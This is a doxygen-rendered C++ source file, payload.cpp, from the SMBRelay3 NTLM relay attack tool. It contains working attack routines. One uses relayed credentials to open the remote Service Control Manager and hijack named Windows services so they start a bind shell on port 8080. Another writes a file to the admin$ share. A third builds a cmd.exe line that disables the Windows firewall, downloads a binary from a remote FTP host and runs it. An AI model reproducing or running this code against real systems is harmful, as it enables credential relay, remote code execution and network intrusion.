C:/Web/smbrelay3/src/payload.cpp

Go to the documentation of this file.
00001 #include "payload.h"
00002 #include <time.h>
00003 
00004 //extern char *filter;
00005 extern int verbose;
00006 int AttackWeakServices(RELAY relay, char *buf,char *path, uint16 FID, char *ServicePath){
00007     //RAW SMBRELAY FUNCTION
00008     smheader *packet;
00009     uint8 ContextHandle[20];
00010     uint8 OpenedServiceContextHandle[20];
00011     char ServiceName[][100] = {"DcomLaunch","Wmi","kdc","upnpHost","SSDPSRV","DHCP","NetBT","DnsCache","Pml Driver HPZ12","Adobe LM Service","Autodesk Licensing Service", "NICCONFIGSVC","Macromedia Licensing Service","vsdatant","C-DillaCdaC11BA","CdaC15BA","SecDrv" };
00012     int len;
00013     char data[4046];
00014     int i,j;
00015 
00016     //Trying to connect with lowest permissions...
00017     len=OpenScManagerWStub(data,path,SC_MANAGER_CONNECT) ;
00018     packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,OPENSCMANAGER,(char*)data,len);
00019     ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
00020     printf("[+] Opening Remote Service Control Manager (SC_MANAGER_CONNECT)\n");   
00021     i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00022     free(packet);    
00023     if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000)  || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
00024        return(0);
00025     }
00026     memcpy((char*)ContextHandle,buf+i-24,20);
00027 
00028     for (j=0;j<sizeof(ServiceName)/100;j++)
00029     {
00030         //OPENING SERVICE WITH MODIFICATION FLAGS..
00031         len=OpenServiceWStub(data,(char*)ContextHandle,ServiceName[j],  SERVICE_CHANGE_CONFIG | SERVICE_START | SERVICE_STOP);
00032         packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,OPENSERVICEW,data,len);
00033         ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
00034         printf("[+] Attacking Remote Service %s\n",ServiceName[j]);
00035         i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00036         free(packet);
00037         if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000)  || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
00038             printf("[-] Error. Unable to Open Remote service                            \n");
00039         } else {
00040             memcpy((char*)OpenedServiceContextHandle,buf+i-24,20);
00041             len=ChangeServiceConfigWStub(data,(char*)OpenedServiceContextHandle,ServicePath, SERVICE_AUTO_START,SERVICE_WIN32_SHARE_PROCESS);
00042             packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,CHANGESERVICECONFIG,data,len);
00043             ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
00044             printf("[+] Cambiando configuración de servicio...\r");
00045             i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00046             free(packet);
00047             if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000)  || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
00048                 printf("[-] Error. Unable to Modify Service...\n");
00049             } else {
00050                 packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,STARTSERVICE,OpenedServiceContextHandle, 20);
00051                 ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
00052                 send(relay.destination, (char*)packet,  SmbPacketLen(packet),0) ;
00053                 free(packet);
00054                 Sleep(1000);
00055                 printf("[+] *** Remote SmbRelay3 BindShell Service Running ***: (%s:%i)\n\n",relay.hostname,8080);    
00056                 Sleep(3000);
00057                 return(1);
00058             }
00059 
00060         }
00061     }
00062     return(0);
00063 }
00064 
00065 int WriteRemoteFile(RELAY relay, smheader *buffer, char *lpFileName)
00066 {
00067         char path[256];
00068         char buf[64000];
00069         smheader *packet;
00070         int i;
00071         int filesize;
00072         char *filedata;
00073         uint16 FID;
00074         uint16 TreeID;
00075 
00076         sprintf(path,"\\\\%s\\admin$",inet_ntoa(relay.destinationaddr.sin_addr));
00077         memset(buf,0,sizeof(buf));
00078     i=BuildTreeConnectAndXStub(buf,"",path,"?????");
00079         packet=BuildSmbPacket((smheader*)buffer,TREECONNETANDX,0,buf,i);//,(int)strlen(path));
00080         printf("[+] Trying to connect to admin$\r");
00081     
00082         if (debug)
00083         {
00084         CleanLine(verbose);
00085         DumpMem((char*)packet,SmbPacketLen(packet));
00086         }
00087     i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00088         if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
00089         CleanLine(verbose);
00090                 printf("[-] Error. Unable to connect to admin$\n");
00091         return(0);
00092         }
00093         TreeID=((smheader*)buf)->TreeId;
00094 
00095 
00096         sprintf(path,"\\%s",lpFileName);
00097         filedata =ReadFileToSend(&filesize,lpFileName);
00098         if(!filedata)
00099         {
00100                 CleanLine(verbose);
00101         printf("[-] Error. Unable to open %s\n",lpFileName);
00102                 return(0);
00103         }
00104         packet=BuildSmbPacket((smheader*)buf,NTCREATEANDX,0,path,filesize);
00105     CleanLine(verbose);
00106         printf("[+] Creating Remote File %s under admin$\r",lpFileName);
00107         if (debug)
00108         {               
00109         CleanLine(verbose);
00110                 DumpMem((char*)packet,SmbPacketLen(packet));
00111         }
00112     i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00113         if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
00114         CleanLine(verbose);
00115         if ( ((smheader*)buf)->NtStatus == STATUS_SHARING_VIOLATION) {
00116             printf("[-] Remote File already in use (try to connect to the remote Shell).\n");
00117             return(1);
00118         }
00119                 printf("[-] Error. Unable to create file under admin$ (Error 0x%x)\n",((smheader*)buf)->NtStatus);
00120         return(0);
00121         }
00122     memcpy((char*)&FID,((smheader*)buf)->buffer+6,2);
00123     CleanLine(verbose);
00124         printf("[+] Writing File %s into admin$ (%i bytes)\r",lpFileName,filesize);
00125         packet=BuildSmbPacket((smheader*)buf,WRITEANDX,0,filedata,filesize);
00126         free(filedata);
00127         
00128         if (debug)
00129         {               
00130         CleanLine(verbose);
00131         DumpMem((char*)packet,SmbPacketLen(packet));
00132         }
00133     i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00134         if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){               
00135         CleanLine(verbose);
00136         printf("[-] Error. Unable to Write File.\n");
00137         return(0);
00138         }
00139 
00140         packet=BuildSmbPacket((smheader*)buf,SMBCLOSE,0,&FID,2);        
00141         
00142         packet->TreeId=TreeID;
00143         if (verbose)
00144         {       
00145         CleanLine(verbose);
00146         printf("[*] Closing File handle - FID: %2.2x\r",FID);
00147                 if (debug) DumpMem((char*)packet,SmbPacketLen(packet));
00148         }
00149     i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
00150         if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
00151         CleanLine(verbose);
00152                 printf("[-] Error Closing File Handle\n");
00153         return(0);
00154         }
00155         return(1);
00156 
00157 }
00158 
00159 
00160 
00161 
00162 /*********************************************/
00163 smheader *BuildSmbPacket1(void)
00164 {
00165         char buf2[4096];
00166         smheader *SmbPacket1;
00167         memset((char*)buf2,'\0',sizeof(buf2));
00168         BuildAuthRequest((tSmbNtlmAuthRequest*)buf2,0,NULL,NULL);
00169 #ifdef _DBG_
00170         DumpMem((char*)buf2,SmbLength((tSmbNtlmAuthRequest*)buf2));
00171 #endif
00172         SmbPacket1=BuildSmbPacket((smheader*)NULL,SESSIONSETUPANDX,0,buf2,40);
00173 
00174         return(SmbPacket1);
00175 }
00176 /*********************************************/
00177 smheader *GetSmbPacket2(RELAY *relay,smheader* Packet1)
00178 {
00179         char *buffer=(char*)malloc(4096);
00180         int i;
00181     i=SendBytesAndWaitForResponse(relay->destination,(char*)Packet1, SmbPacketLen(Packet1), buffer,4096,SMBWAITTIMEOUT);
00182         if (i>0){
00183                 return((smheader*)buffer);
00184         }
00185         return(NULL);
00186 }
00187 /*********************************************/
00188 smheader *GetSmbPacket3(smheader* SmbPacket2,char *lpUserName, char *lpPassword,  char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3)
00189 {
00190         char buf2[16384];
00191         smheader *SmbPacket3;
00192         memset((char*)buf2,'\0',sizeof(buf2));
00193         buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,lpUserName,lpPassword,domainname,host, OptionalNtlmPacket3);
00194     //DumpMem((void*)buf2,sizeof(tSmbNtlmAuthResponse));
00195         SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));
00196         return(SmbPacket3);
00197 }
00198 /*********************************************/
00199 
00200 
00201 char *GenerateFTPTransfer(char *buffer,char *host, int port, char *username, char *password, char *downloadfile,char *optionalparameter)
00202 {
00203     char tmp[256];
00204     char path[256];
00205     char fullpath[100];
00206     int random=0;
00207 
00208     srand(time(0));
00209     random=rand();
00210     sprintf(path,"\\%i",random);
00211     srand(random);
00212     random=rand();
00213     sprintf(fullpath,"%s\\%i",path,random);
00214 
00215     //sprintf(tmp,"cmd.exe /c if EXIST %s\\%s (%s\\%s) ELSE netsh firewall add portopening TCP 8080 Smbrelay ENABLE ALL && ",path,downloadfile,path,downloadfile);
00216     sprintf(tmp,"cmd.exe /c if EXIST %s\\%s (%s\\%s) ELSE netsh firewall set opmode DISABLE DISABLE & ",path,downloadfile,path,downloadfile);
00217     strcpy(buffer,tmp);
00218 
00219     sprintf(tmp,"md %s",path);
00220     strcat(buffer,tmp);
00221     sprintf(tmp,"&& echo o %s %i>%s",host, port,fullpath);
00222     strcat(buffer,tmp);
00223     sprintf(tmp,"&& echo %s>>%s",username,fullpath);
00224     strcat(buffer,tmp);
00225     sprintf(tmp,"&& echo %s>>%s",password,fullpath);
00226     strcat(buffer,tmp);
00227     sprintf(tmp,"&& echo USER %s>>%s",username,fullpath); //try password twice
00228     strcat(buffer,tmp);
00229     sprintf(tmp,"&& echo %s>>%s",password,fullpath);
00230     strcat(buffer,tmp);
00231     sprintf(tmp,"&& echo bin>>%s",fullpath);
00232     strcat(buffer,tmp);
00233     sprintf(tmp,"&& echo lcd %s>>%s",path,fullpath);
00234     strcat(buffer,tmp);
00235     sprintf(tmp,"&& echo bin>>%s",fullpath);
00236     strcat(buffer,tmp);
00237     sprintf(tmp,"&& echo GET %s>>%s",downloadfile,fullpath);
00238     strcat(buffer,tmp);
00239     sprintf(tmp,"&& echo bye>>%s",fullpath);
00240     strcat(buffer,tmp);
00241     sprintf(tmp,"&& ftp -s:%s",fullpath);
00242     strcat(buffer,tmp);
00243     if (optionalparameter) {
00244             sprintf(tmp,"&& %s\\%s %s",path,downloadfile,optionalparameter);
00245     } else {
00246             sprintf(tmp,"&& %s\\%s",path,downloadfile);
00247     }
00248     strcat(buffer,tmp);
00249 
00250     return(buffer);
00251 }
00252 
00253 
00254 

Generated on Wed Nov 12 22:04:28 2008 for Smbrelay version 3 by  doxygen 1.5.4